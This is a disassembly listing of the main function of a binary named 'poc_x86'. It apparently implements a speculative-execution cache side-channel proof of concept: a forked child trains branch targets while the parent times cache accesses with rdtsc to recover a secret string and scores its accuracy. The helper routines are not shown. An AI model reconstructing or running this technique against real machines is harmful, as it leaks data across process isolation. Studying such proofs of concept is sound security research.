
poc_x86:     file format elf64-x86-64


Disassembly of section .init:

Disassembly of section .plt:

Disassembly of section .text:

00000000000011a0 <main>:
    11a0:	41 57                	push   %r15
    11a2:	41 56                	push   %r14
    11a4:	41 55                	push   %r13
    11a6:	4c 8d 2d 98 0e 06 00 	lea    0x60e98(%rip),%r13        # 62045 <_IO_stdin_used+0x45>
    11ad:	41 54                	push   %r12
    11af:	55                   	push   %rbp
    11b0:	31 ed                	xor    %ebp,%ebp
    11b2:	53                   	push   %rbx
    11b3:	31 db                	xor    %ebx,%ebx
    11b5:	48 81 ec c8 38 01 00 	sub    $0x138c8,%rsp
    11bc:	64 48 8b 04 25 28 00 	mov    %fs:0x28,%rax
    11c3:	00 00 
    11c5:	48 89 84 24 b8 38 01 	mov    %rax,0x138b8(%rsp)
    11cc:	00 
    11cd:	31 c0                	xor    %eax,%eax
    11cf:	48 8d 7c 24 10       	lea    0x10(%rsp),%rdi
    11d4:	e8 0d 08 06 00       	call   619e6 <setup>
    11d9:	e8 b2 ff ff ff       	call   1190 <fork@plt>
    11de:	41 89 c4             	mov    %eax,%r12d
    11e1:	8d 43 01             	lea    0x1(%rbx),%eax
    11e4:	b9 19 00 00 00       	mov    $0x19,%ecx
    11e9:	31 d2                	xor    %edx,%edx
    11eb:	4c 89 ef             	mov    %r13,%rdi
    11ee:	48 98                	cltq
    11f0:	48 f7 f1             	div    %rcx
    11f3:	31 c0                	xor    %eax,%eax
    11f5:	49 89 d6             	mov    %rdx,%r14
    11f8:	89 d3                	mov    %edx,%ebx
    11fa:	e8 91 fe ff ff       	call   1090 <printf@plt>
    11ff:	44 89 e7             	mov    %r12d,%edi
    1202:	e8 29 ff ff ff       	call   1130 <__getpgid@plt>
    1207:	44 89 e2             	mov    %r12d,%edx
    120a:	48 8d 3d 3e 0e 06 00 	lea    0x60e3e(%rip),%rdi        # 6204f <_IO_stdin_used+0x4f>
    1211:	89 c6                	mov    %eax,%esi
    1213:	31 c0                	xor    %eax,%eax
    1215:	e8 76 fe ff ff       	call   1090 <printf@plt>
    121a:	31 c0                	xor    %eax,%eax
    121c:	45 85 e4             	test   %r12d,%r12d
    121f:	75 07                	jne    1228 <main+0x88>
    1221:	e8 cc 08 06 00       	call   61af2 <train_ip>
    1226:	eb b9                	jmp    11e1 <main+0x41>
    1228:	e8 ce 02 00 00       	call   14fb <rdtsc>
    122d:	44 89 f7             	mov    %r14d,%edi
    1230:	49 89 c7             	mov    %rax,%r15
    1233:	e8 0b 07 06 00       	call   61943 <access_array>
    1238:	49 83 fe 04          	cmp    $0x4,%r14
    123c:	76 10                	jbe    124e <main+0xae>
    123e:	0f ae f0             	mfence
    1241:	48 8d 7c 24 18       	lea    0x18(%rsp),%rdi
    1246:	44 89 f6             	mov    %r14d,%esi
    1249:	e8 46 06 00 00       	call   1894 <cache_decode_pretty>
    124e:	31 c0                	xor    %eax,%eax
    1250:	48 8d 7c 24 1d       	lea    0x1d(%rsp),%rdi
    1255:	48 8d 35 89 0e 06 00 	lea    0x60e89(%rip),%rsi        # 620e5 <_IO_stdin_used+0xe5>
    125c:	e8 9a 02 00 00       	call   14fb <rdtsc>
    1261:	48 63 d5             	movslq %ebp,%rdx
    1264:	ff c5                	inc    %ebp
    1266:	4c 29 f8             	sub    %r15,%rax
    1269:	48 89 44 d4 38       	mov    %rax,0x38(%rsp,%rdx,8)
    126e:	ba 13 00 00 00       	mov    $0x13,%edx
    1273:	e8 d8 fd ff ff       	call   1050 <strncmp@plt>
    1278:	85 c0                	test   %eax,%eax
    127a:	74 11                	je     128d <main+0xed>
    127c:	e8 1f fe ff ff       	call   10a0 <sched_yield@plt>
    1281:	81 fd 10 27 00 00    	cmp    $0x2710,%ebp
    1287:	0f 85 54 ff ff ff    	jne    11e1 <main+0x41>
    128d:	be 0f 00 00 00       	mov    $0xf,%esi
    1292:	44 89 e7             	mov    %r12d,%edi
    1295:	45 31 ff             	xor    %r15d,%r15d
    1298:	31 db                	xor    %ebx,%ebx
    129a:	e8 61 fe ff ff       	call   1100 <kill@plt>
    129f:	48 8d 3d c0 0d 06 00 	lea    0x60dc0(%rip),%rdi        # 62066 <_IO_stdin_used+0x66>
    12a6:	e8 b5 fd ff ff       	call   1060 <puts@plt>
    12ab:	bf 01 00 00 00       	mov    $0x1,%edi
    12b0:	e8 bb fe ff ff       	call   1170 <sleep@plt>
    12b5:	48 8d 35 c6 0d 06 00 	lea    0x60dc6(%rip),%rsi        # 62082 <_IO_stdin_used+0x82>
    12bc:	48 8d 3d c1 0d 06 00 	lea    0x60dc1(%rip),%rdi        # 62084 <_IO_stdin_used+0x84>
    12c3:	e8 88 fe ff ff       	call   1150 <fopen@plt>
    12c8:	4c 8b 64 24 38       	mov    0x38(%rsp),%r12
    12cd:	48 89 44 24 08       	mov    %rax,0x8(%rsp)
    12d2:	4d 89 e5             	mov    %r12,%r13
    12d5:	44 39 fd             	cmp    %r15d,%ebp
    12d8:	7e 31                	jle    130b <main+0x16b>
    12da:	4e 8b 74 fc 38       	mov    0x38(%rsp,%r15,8),%r14
    12df:	48 8b 7c 24 08       	mov    0x8(%rsp),%rdi
    12e4:	31 c0                	xor    %eax,%eax
    12e6:	48 8d 35 a1 0d 06 00 	lea    0x60da1(%rip),%rsi        # 6208e <_IO_stdin_used+0x8e>
    12ed:	4c 89 f2             	mov    %r14,%rdx
    12f0:	4c 01 f3             	add    %r14,%rbx
    12f3:	e8 d8 fd ff ff       	call   10d0 <fprintf@plt>
    12f8:	4d 39 f4             	cmp    %r14,%r12
    12fb:	4d 0f 42 e6          	cmovb  %r14,%r12
    12ff:	4d 39 f5             	cmp    %r14,%r13
    1302:	4d 0f 47 ee          	cmova  %r14,%r13
    1306:	49 ff c7             	inc    %r15
    1309:	eb ca                	jmp    12d5 <main+0x135>
    130b:	48 8b 7c 24 10       	mov    0x10(%rsp),%rdi
    1310:	48 63 ed             	movslq %ebp,%rbp
    1313:	e8 28 fd ff ff       	call   1040 <free@plt>
    1318:	48 89 d8             	mov    %rbx,%rax
    131b:	31 d2                	xor    %edx,%edx
    131d:	4c 89 e6             	mov    %r12,%rsi
    1320:	48 f7 f5             	div    %rbp
    1323:	48 8d 3d 69 0d 06 00 	lea    0x60d69(%rip),%rdi        # 62093 <_IO_stdin_used+0x93>
    132a:	4c 89 ea             	mov    %r13,%rdx
    132d:	48 89 c1             	mov    %rax,%rcx
    1330:	31 c0                	xor    %eax,%eax
    1332:	e8 59 fd ff ff       	call   1090 <printf@plt>
    1337:	b8 05 00 00 00       	mov    $0x5,%eax
    133c:	31 d2                	xor    %edx,%edx
    133e:	48 8d 4c 24 18       	lea    0x18(%rsp),%rcx
    1343:	48 8d 35 96 0d 06 00 	lea    0x60d96(%rip),%rsi        # 620e0 <_IO_stdin_used+0xe0>
    134a:	8a 1c 06             	mov    (%rsi,%rax,1),%bl
    134d:	38 1c 01             	cmp    %bl,(%rcx,%rax,1)
    1350:	75 02                	jne    1354 <main+0x1b4>
    1352:	ff c2                	inc    %edx
    1354:	48 ff c0             	inc    %rax
    1357:	48 83 f8 19          	cmp    $0x19,%rax
    135b:	75 ed                	jne    134a <main+0x1aa>
    135d:	b0 01                	mov    $0x1,%al
    135f:	f3 0f 2a c2          	cvtsi2ss %edx,%xmm0
    1363:	48 8d 3d 8f 0d 06 00 	lea    0x60d8f(%rip),%rdi        # 620f9 <_IO_stdin_used+0xf9>
    136a:	f3 0f 5e 05 a2 0d 06 	divss  0x60da2(%rip),%xmm0        # 62114 <_IO_stdin_used+0x114>
    1371:	00 
    1372:	f3 0f 5a c0          	cvtss2sd %xmm0,%xmm0
    1376:	e8 15 fd ff ff       	call   1090 <printf@plt>
    137b:	48 8b 7c 24 08       	mov    0x8(%rsp),%rdi
    1380:	e8 eb fc ff ff       	call   1070 <fclose@plt>
    1385:	48 8b 84 24 b8 38 01 	mov    0x138b8(%rsp),%rax
    138c:	00 
    138d:	64 48 2b 04 25 28 00 	sub    %fs:0x28,%rax
    1394:	00 00 
    1396:	74 05                	je     139d <main+0x1fd>
    1398:	e8 e3 fc ff ff       	call   1080 <__stack_chk_fail@plt>
    139d:	48 81 c4 c8 38 01 00 	add    $0x138c8,%rsp
    13a4:	31 c0                	xor    %eax,%eax
    13a6:	5b                   	pop    %rbx
    13a7:	5d                   	pop    %rbp
    13a8:	41 5c                	pop    %r12
    13aa:	41 5d                	pop    %r13
    13ac:	41 5e                	pop    %r14
    13ae:	41 5f                	pop    %r15
    13b0:	c3                   	ret

Disassembly of section .fini:
